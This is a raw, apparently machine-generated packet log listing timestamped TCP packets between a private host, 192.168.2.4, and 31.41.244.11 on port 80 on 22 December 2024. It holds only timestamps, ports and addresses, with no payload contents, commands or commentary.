Dec 22, 2024 02:16:15.133260012 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.133289099 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.133305073 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.134031057 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.134114027 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.134131908 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.134164095 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.134179115 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.134893894 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.134999037 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.135015965 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.135046005 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.135061026 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.135803938 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.135870934 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.135886908 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.135917902 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.135932922 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.136658907 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.136769056 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.136785984 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.136815071 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.136831999 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.137574911 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.137731075 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.137751102 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.137788057 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.137804031 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.138505936 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.138588905 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.138606071 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.138653040 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.138684988 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.139332056 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.139436007 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.139452934 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.139489889 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.139503956 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.140208960 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.140319109 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.140336037 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.140372992 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.140398979 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.141158104 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.141230106 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.141247034 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.141283989 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.141314983 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.142019033 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.142090082 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.142106056 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.142143965 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.142159939 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.142959118 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.143110991 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.143126965 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.143165112 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.143815994 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.144162893 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.144211054 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.144213915 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.144228935 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.144258976 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.144277096 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.145032883 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.145049095 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.145066023 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.145082951 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.145107985 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.145872116 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.145937920 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.145953894 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.145988941 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.146011114 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.146706104 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.146898985 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.146917105 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.146945953 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.146969080 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.147614002 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.147742987 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.147761106 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.147797108 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.147814035 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.148504019 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.148655891 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.148673058 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.148705006 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.148725033 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.149378061 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.149482012 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.149501085 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.149528980 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.149544001 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.150269985 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.150428057 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.150444031 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.150475979 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.150491953 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.151130915 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.151372910 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.151390076 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.151420116 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.151437044 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.157234907 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.157259941 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.157278061 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.157306910 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.157318115 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.157423019 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.157452106 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.157468081 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.157500982 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.158241987 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.158263922 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.158308983 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.314991951 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.315037966 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.315054893 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.315077066 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.315119982 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.315119982 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.315365076 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.315418959 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.315475941 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.315495014 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.315522909 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.315537930 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.316260099 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.316304922 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.316374063 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.316390991 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.316416979 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.316433907 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.317274094 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.317291021 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.317306995 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.317318916 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.317341089 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.317349911 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.318012953 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.318058014 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.318131924 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.318147898 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.318175077 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.318190098 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.318923950 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.318970919 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.319070101 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.319087029 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.319114923 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.319129944 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.319829941 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.319875956 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.319920063 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.319937944 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.319987059 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.320010900 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.320722103 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.320769072 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.320810080 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.320827007 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.320858002 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.320873976 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.321552038 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.321599007 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.321655989 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.321671963 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.321702957 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.321722031 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.322500944 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.322552919 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.322592974 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.322611094 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.322648048 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.322663069 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.323375940 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.323422909 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.323440075 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.323457956 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.323486090 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.323498011 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.324248075 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.324294090 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.324361086 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.324378014 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.324407101 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.324417114 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.325154066 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.325201035 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.325232983 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.325249910 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.325277090 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.325292110 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.326014996 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.326061964 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.326098919 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.326117039 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.326143980 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.326158047 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.326884985 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.326951027 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.326982975 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.327002048 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.327030897 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.327047110 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.327786922 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.327864885 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.327896118 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.327914000 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.327944040 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.327960014 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.328685999 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.328735113 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.328845024 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.328862906 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.328888893 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.328900099 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.329581022 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.329627991 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.329667091 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.329685926 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.329711914 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.329726934 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.330511093 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.330538988 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.330557108 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.330563068 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.330578089 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.330600977 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.331370115 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.331418991 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.331449032 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.331466913 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.331492901 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.331506968 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.332221031 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.332277060 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.332297087 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.332343102 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.332432032 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.332475901 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.333152056 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.333197117 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.333261013 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.333277941 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.333302975 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.333317041 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.334022999 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.334074974 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.334089041 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.334106922 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.334134102 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.334147930 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.334992886 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.335021973 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.335040092 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.335042000 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.335064888 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.335078955 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.335783005 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.335832119 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.336030960 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.336077929 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.336168051 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.336184978 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.336211920 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.336226940 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.336982965 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.337033987 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.337034941 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.337053061 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.337076902 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.337091923 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.337830067 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.337874889 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.337932110 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.337949991 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.338006973 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.338006973 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.338850021 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.338866949 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.338884115 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.338901043 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.338916063 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.338926077 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.339612961 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.339664936 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.339704037 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.339720011 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.339750051 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.339764118 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.340507030 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.340554953 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.340610027 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.340626955 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.340651989 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.340667009 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.341430902 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.341474056 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.341479063 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.341492891 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.341515064 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.341527939 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.342309952 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.342356920 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.342367887 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.342384100 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.342416048 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.342441082 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.343163967 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.343211889 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.343238115 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.343255043 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.343282938 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.343297005 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.349069118 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.349121094 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.349150896 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.349169016 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.349195004 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.349205017 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.349354029 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.349400043 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.349442005 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.349458933 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.349483967 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.349498987 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.350231886 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.350280046 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.350308895 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.350353956 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.507242918 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.507292032 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.507329941 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.507348061 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.507365942 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.507375002 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.507411957 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.507975101 CET	80	49765	31.41.244.11	192.168.2.4
